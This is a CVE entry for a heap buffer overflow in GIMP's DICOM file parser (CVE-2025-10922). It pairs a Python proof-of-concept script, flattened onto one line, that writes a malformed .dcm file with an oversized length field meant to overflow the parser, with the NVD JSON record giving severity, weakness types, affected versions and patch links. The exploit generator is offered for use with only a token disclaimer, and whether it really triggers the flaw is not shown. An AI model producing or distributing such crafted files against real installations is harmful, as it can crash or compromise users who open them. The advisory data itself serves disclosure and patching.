CVE-2025-10922

#!/usr/bin/env python3 """ CVE-2025-10922 PoC - GIMP DCM File Parsing Heap Buffer Overflow Note: This PoC is for educational and security research purposes only. Author: Security Research Reference: ZDI-CAN-27863 """ import struct import sys def create_malicious_dcm(): """ Generate a malicious DCM file to trigger heap buffer overflow in GIMP's DCM file parser. """ # DCM File Preamble (128 bytes) preamble = b'\x00' * 128 # DICOM Magic Number magic = b'DICM' # Create malformed DCM data with oversized field # This exploits the lack of length validation in GIMP's parser malicious_data = b'\x08\x00\x01\x00' # Group/Element tag malicious_data += struct.pack('<I', 0xFFFFFFFF) # Invalid length (VL) malicious_data += b'\x41' * 65536 # Oversized data to overflow heap buffer dcm_file = preamble + magic + malicious_data return dcm_file def main(): print("[*] CVE-2025-10922 PoC Generator") print("[*] Target: GIMP DCM File Parser") print("[*] Vulnerability: Heap-based Buffer Overflow") if len(sys.argv) < 2: output_file = 'malicious_cve202510922.dcm' else: output_file = sys.argv[1] print(f"[*] Generating malicious DCM file: {output_file}") malicious_dcm = create_malicious_dcm() with open(output_file, 'wb') as f: f.write(malicious_dcm) print(f"[+] Malicious DCM file created: {output_file}") print(f"[+] File size: {len(malicious_dcm)} bytes") print("[!] Warning: This PoC is for research purposes only") print("[!] Do not use for malicious purposes") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-10922", "sourceIdentifier": "[email protected]", "published": "2025-10-29T20:15:34.923", "lastModified": "2025-11-04T13:15:06.710", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GIMP DCM File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of DCM files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27863."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gimp:gimp:3.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "103D75C8-35B7-4E50-B75C-2D75294CB7AC"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED"}]}]}], "references": [{"url": "https://gitlab.gnome.org/GNOME/gimp/-/commit/3d909166463731e94dfe62042d76225ecfc4c1e4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-911/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00022.html", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}]}}